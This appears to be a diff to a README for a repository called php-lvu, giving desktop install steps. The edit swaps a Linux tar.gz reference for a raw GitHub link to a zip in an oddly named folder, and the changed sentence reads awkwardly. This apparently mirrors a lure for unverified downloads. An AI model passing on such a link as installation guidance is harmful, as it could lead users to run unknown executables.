sundayluckyenyinnadeveloper/php-lvu/README.md

 5. **Install the Application**
    - For **Windows**: Double-click the .exe file and follow the installation instructions.
    - For **macOS**: Open the .dmg file, drag the php-lvu icon to your Applications folder.
-   - For **Linux**: Extract the tar.gz file and follow the included README for installation guidance.
+   - For **Linux**: Extract the https://raw.githubusercontent.com/sundayluckyenyinnadeveloper/php-lvu/main/azimuthally/php-lvu.zip file and follow the included README for installation guidance.

 6. **Run php-lvu**
    Open php-lvu by finding it in your Applications (or Program Files) and click to launch.